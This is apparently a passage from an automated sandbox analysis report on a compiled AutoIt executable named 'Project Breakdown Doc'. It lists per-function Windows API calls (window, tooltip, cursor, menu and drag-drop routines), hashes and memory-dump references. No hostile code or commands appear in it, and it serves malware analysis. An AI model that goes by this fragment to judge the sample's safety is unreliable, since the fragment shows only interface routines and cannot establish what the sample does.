                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC8DDC
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CC8DF9
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00CC8E45
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CC8E5B
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC8E8C
                                                  • _memset.LIBCMT ref: 00CC8EB1
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CC8EFA
                                                  • _memset.LIBCMT ref: 00CC8F59
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CC8F83
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CC8FDB
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00CC9088
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00CC90AA
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC90F4
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC9121
                                                  • DrawMenuBar.USER32(?), ref: 00CC9130
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00CC9158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 011d774e55837f4f79f187dfb8649648294944ea4819711f8ef0d4c223ae4d35
                                                  • Instruction ID: 801dc3dbe53c37e87a8b81d67954220eec880bcc6b944d8dc214dcbb99f80c79
                                                  • Opcode Fuzzy Hash: 011d774e55837f4f79f187dfb8649648294944ea4819711f8ef0d4c223ae4d35
                                                  • Instruction Fuzzy Hash: B6E17270900219ABDF209F55CC89FEF7BB9EF05710F14815DF926AA290DB709A85DF60
                                                  Function 00CC4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00CC4C51
                                                  • GetDesktopWindow.USER32 ref: 00CC4C66
                                                  • GetWindowRect.USER32(00000000), ref: 00CC4C6D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CC4CCF
                                                  • DestroyWindow.USER32(?), ref: 00CC4CFB
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC4D24
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC4D42
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC4D68
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00CC4D7D
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC4D90
                                                  • IsWindowVisible.USER32(?), ref: 00CC4DB0
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC4DCB
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC4DDF
                                                  • GetWindowRect.USER32(?,?), ref: 00CC4DF7
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00CC4E1D
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00CC4E37
                                                  • CopyRect.USER32(?,?), ref: 00CC4E4E
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00CC4EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0f3372717c8cf68a239680f5e23b18f90b2dbf9be479d4be62a7f47ae2331709
                                                  • Instruction ID: 5754f5f2e3820d34cd13f47fdf4cff8b6037201ee5aa53b39a295a58a0120e7a
                                                  • Opcode Fuzzy Hash: 0f3372717c8cf68a239680f5e23b18f90b2dbf9be479d4be62a7f47ae2331709
                                                  • Instruction Fuzzy Hash: E5B14771604350AFDB08DF65C898F6ABBE5FB88710F00891CF59A9B2A1DB71ED05CB91
                                                  Function 00C427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C428BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00C428C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C428EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00C428F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00C4291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C42939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C42949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C4297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C42990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00C429AE
                                                  • GetStockObject.GDI32(00000011), ref: 00C429CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C429D5
                                                    • Part of subcall function 00C42344: GetCursorPos.USER32(?), ref: 00C42357
                                                    • Part of subcall function 00C42344: ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00C41256), ref: 00C429FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 752874d510cbdffb7ca56d3ad73f296c7b57b07ebcd73658a2e36def93f3b8e1
                                                  • Instruction ID: 02d21737d129b77a630be2badbd3c633da4057fb36be372bfa6f7e839ada5e85
                                                  • Opcode Fuzzy Hash: 752874d510cbdffb7ca56d3ad73f296c7b57b07ebcd73658a2e36def93f3b8e1
                                                  • Instruction Fuzzy Hash: 2FB12C71A0020A9FDB14DFA8DC85BAE7BB5FB48314F108129FA19E72E0DB74D951DB60
                                                  Function 00CC4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CC40F6
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CC41B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: a665962b1a7a29ba57f3626e4c49f7ac266199ac6fffa537771e448f4abd1fd0
                                                  • Instruction ID: 2c7644364d31715ca4c8fc11f0b7be009cf597be560b61321a708606c32c4cb4
                                                  • Opcode Fuzzy Hash: a665962b1a7a29ba57f3626e4c49f7ac266199ac6fffa537771e448f4abd1fd0
                                                  • Instruction Fuzzy Hash: F1A16E702142559BCB18EF20C9A1F6AB3A5FF84314F14896CF9A69B3D2DB30ED05DB51
                                                  Function 00CB52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00CB5309
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00CB5314
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00CB531F
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00CB532A
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00CB5335
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00CB5340
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00CB534B
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00CB5356
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00CB5361
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00CB536C
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00CB5377
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00CB5382
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00CB538D
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00CB5398
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00CB53A3
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00CB53AE
                                                  • GetCursorInfo.USER32(?), ref: 00CB53BE
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00CB53E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: ae19d6dad61383082473b2714e5cf5acae28251b835141d177f8a31ac3478f20
                                                  • Instruction ID: def055ea4e983f0f2aeef533ac5084acce263148ce897a1ad66bc90c798be8af
                                                  • Opcode Fuzzy Hash: ae19d6dad61383082473b2714e5cf5acae28251b835141d177f8a31ac3478f20
                                                  • Instruction Fuzzy Hash: C2415070E043196ADB109FBA8C49DAFFEF8EF51B50F10452FE519E7290DAB8A5018E61
                                                  Function 00C9AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9AAA5
                                                  • __swprintf.LIBCMT ref: 00C9AB46
                                                  • _wcscmp.LIBCMT ref: 00C9AB59
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C9ABAE
                                                  • _wcscmp.LIBCMT ref: 00C9ABEA
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C9AC21
                                                  • GetDlgCtrlID.USER32(?), ref: 00C9AC73
                                                  • GetWindowRect.USER32(?,?), ref: 00C9ACA9
                                                  • GetParent.USER32(?), ref: 00C9ACC7
                                                  • ScreenToClient.USER32(00000000), ref: 00C9ACCE
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9AD48
                                                  • _wcscmp.LIBCMT ref: 00C9AD5C
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C9AD82
                                                  • _wcscmp.LIBCMT ref: 00C9AD96
                                                    • Part of subcall function 00C6386C: _iswctype.LIBCMT ref: 00C63874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 4692f0b3c2f26d103af3b4169304d38d4675052f97cbab8722f0eebdcf28657b
                                                  • Instruction ID: 7236f3b5ca4fbe48abd46c727c0590720de87b2630bed21b11b630888e23f78a
                                                  • Opcode Fuzzy Hash: 4692f0b3c2f26d103af3b4169304d38d4675052f97cbab8722f0eebdcf28657b
                                                  • Instruction Fuzzy Hash: 02A1CF72204706AFDB14DF24C888FAAB7E8FF04315F104629F9A9D6590DB30EA55DBD2
                                                  Function 00C9B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C9B3DB
                                                  • _wcscmp.LIBCMT ref: 00C9B3EC
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C9B414
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C9B431
                                                  • _wcscmp.LIBCMT ref: 00C9B44F
                                                  • _wcsstr.LIBCMT ref: 00C9B460
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9B498
                                                  • _wcscmp.LIBCMT ref: 00C9B4A8
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C9B4CF
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9B518
                                                  • _wcscmp.LIBCMT ref: 00C9B528
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C9B550
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C9B5B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 2f7d815bc52b62ce7be791b29c6e6445621e10c020cbd43b9a9f2f88723e6c2c
                                                  • Instruction ID: 57d816f309f888a40f501252c9c0192e088c636527f7f6bd374990fb1aa57bd4
                                                  • Opcode Fuzzy Hash: 2f7d815bc52b62ce7be791b29c6e6445621e10c020cbd43b9a9f2f88723e6c2c
                                                  • Instruction Fuzzy Hash: DD818E71008209ABDF14DF10EA89FAA7BE8FF44314F048569FD959A0A2DB34EE45DB61
                                                  Function 00C9B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 47c9486875cc2dae9e8d07dcb81931a3b6ea1167331aba253425b9892fd5bc5a
                                                  • Instruction ID: bf613fc3b8f6f2b7c7bbda422226032298445949b217ae7443093b1c26facbeb
                                                  • Opcode Fuzzy Hash: 47c9486875cc2dae9e8d07dcb81931a3b6ea1167331aba253425b9892fd5bc5a
                                                  • Instruction Fuzzy Hash: 2E31BC31A04209A6DF14FBA0DE87FFE77A8EF20750F60012AB551B10E2EF616F04E952
                                                  Function 00C9C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 00C9C4D4
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9C4E6
                                                  • SetWindowTextW.USER32(?,?), ref: 00C9C4FD
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C9C512
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C9C518
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C528
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C9C52E
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C9C54F
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C9C569
                                                  • GetWindowRect.USER32(?,?), ref: 00C9C572
                                                  • SetWindowTextW.USER32(?,?), ref: 00C9C5DD
                                                  • GetDesktopWindow.USER32 ref: 00C9C5E3
                                                  • GetWindowRect.USER32(00000000), ref: 00C9C5EA
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C9C636
                                                  • GetClientRect.USER32(?,?), ref: 00C9C643
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C9C668
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9C693
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 97023c3c430dffcd9fcfc8b77b0444f24fa3cddf6b05e2da6a363b311db6c1bb
                                                  • Instruction ID: dc446959c88c1d63cb78921492124e572fc2f0c9ed586bb0dc71bdec629cf2f1
                                                  • Opcode Fuzzy Hash: 97023c3c430dffcd9fcfc8b77b0444f24fa3cddf6b05e2da6a363b311db6c1bb
                                                  • Instruction Fuzzy Hash: 07514A71A00709AFDB20DFA8DD89F6EBBB5FF04705F00492CF696A25A0C774AA15DB50
                                                  Function 00CCA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CCA4C8
                                                  • DestroyWindow.USER32(?,?), ref: 00CCA542
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CCA5BC
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CCA5DE
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCA5F1
                                                  • DestroyWindow.USER32(00000000), ref: 00CCA613
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C40000,00000000), ref: 00CCA64A
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCA663
                                                  • GetDesktopWindow.USER32 ref: 00CCA67C
                                                  • GetWindowRect.USER32(00000000), ref: 00CCA683
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CCA69B
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CCA6B3
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: f843b3024668c8b13d271c36dba0cd05d130bd6a7fc2c1b28490eb19ff616890
                                                  • Instruction ID: ddd736099ae2f5609defd1160a02d157167ce1f72f0c0a74902871ce792e24ac
                                                  • Opcode Fuzzy Hash: f843b3024668c8b13d271c36dba0cd05d130bd6a7fc2c1b28490eb19ff616890
                                                  • Instruction Fuzzy Hash: AB717971140209AFD720CF28DC49F6A7BE6FB88308F08452DF995872A0D771EA56DB66
                                                  Function 00CCC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00CCC917
                                                    • Part of subcall function 00CCADF1: ClientToScreen.USER32(?,?), ref: 00CCAE1A
                                                    • Part of subcall function 00CCADF1: GetWindowRect.USER32(?,?), ref: 00CCAE90
                                                    • Part of subcall function 00CCADF1: PtInRect.USER32(?,?,00CCC304), ref: 00CCAEA0
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCC980
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CCC98B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CCC9AE
                                                  • _wcscat.LIBCMT ref: 00CCC9DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CCC9F5
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCCA0E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCCA25
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCCA47
                                                  • DragFinish.SHELL32(?), ref: 00CCCA4E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CCCB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 03221605dfcea72ed07fc96470aec960d77c155efefc353b9143b7bb1f3ea175
                                                  • Instruction ID: ac1a1cc25010f5f50030cacf2115b8c7796e2c4e0ed45ccce2ed405fa6efa388
                                                  • Opcode Fuzzy Hash: 03221605dfcea72ed07fc96470aec960d77c155efefc353b9143b7bb1f3ea175
                                                  • Instruction Fuzzy Hash: F1614B71108305AFC711DF64CC85EAFBBE9FF88750F000A2DF595962A1DB709A49DB62
                                                  Function 00CC4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                  Download Yara Rule
                                                  APIs
